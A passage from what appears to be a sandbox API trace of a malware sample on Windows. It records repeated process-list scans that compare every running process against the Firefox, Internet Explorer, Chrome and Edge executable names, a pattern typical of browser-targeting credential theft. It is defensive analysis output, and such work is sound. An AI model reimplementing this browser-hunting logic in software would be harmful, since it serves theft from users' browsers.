th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0213.890] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0213.890] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0213.890] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0213.890] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.890] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0213.891] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0213.891] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0213.891] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0213.891] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.891] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.891] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0213.891] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0213.891] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0213.891] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.891] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.892] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.892] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.892] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.892] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.892] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0213.893] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0213.893] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0213.893] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0213.893] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.893] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.893] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0213.893] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0213.893] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0213.893] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.893] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.894] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0213.894] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0213.894] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0213.894] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.894] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.894] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.894] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.894] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.894] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.894] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0213.895] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0213.895] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0213.895] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0213.895] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.895] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.895] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0213.896] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0213.896] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0213.896] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0213.896] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.896] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.896] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.896] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.896] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.896] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.897] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.897] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.897] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.897] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.897] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.897] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.897] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.897] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.897] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.897] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.898] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0213.898] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0213.898] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0213.898] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0213.898] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0213.947] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0213.947] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0213.947] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0213.947] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0213.947] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0213.948] CloseHandle (hObject=0xd4) returned 1 [0213.948] Sleep (dwMilliseconds=0x3e8) [0215.072] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0215.075] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.076] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0215.076] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0215.076] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0215.076] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0215.076] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.076] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0215.076] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0215.076] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0215.076] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0215.076] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.077] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0215.077] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0215.077] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0215.077] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.077] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.078] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0215.078] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0215.078] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0215.078] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.078] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.078] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0215.078] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0215.078] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0215.078] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.078] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.079] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0215.079] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0215.079] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0215.079] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.079] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.080] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0215.080] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0215.080] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0215.080] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.080] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.080] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0215.080] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0215.080] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0215.080] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.080] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.081] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0215.081] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0215.081] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0215.081] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.081] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0215.081] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0215.081] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0215.081] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0215.081] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.081] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.082] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.082] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.082] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.082] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.082] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.082] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.082] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.082] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.082] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.083] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.083] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.083] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.083] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.083] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.083] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.084] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.084] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.084] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.084] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.084] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.084] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.084] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.084] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.084] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.084] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.085] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0215.085] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0215.085] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0215.085] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.085] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.085] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.085] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.085] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.085] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.085] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.086] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.086] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.086] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.087] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.087] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.087] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0215.087] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0215.087] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0215.087] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.087] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.088] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0215.088] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0215.088] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0215.088] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.088] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0215.088] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0215.088] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0215.088] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0215.088] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.088] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.089] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0215.089] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0215.089] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0215.089] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.089] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0215.089] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0215.089] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0215.089] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0215.089] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.089] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0215.090] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0215.090] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0215.090] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0215.090] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0215.091] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0215.091] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0215.091] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0215.091] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, 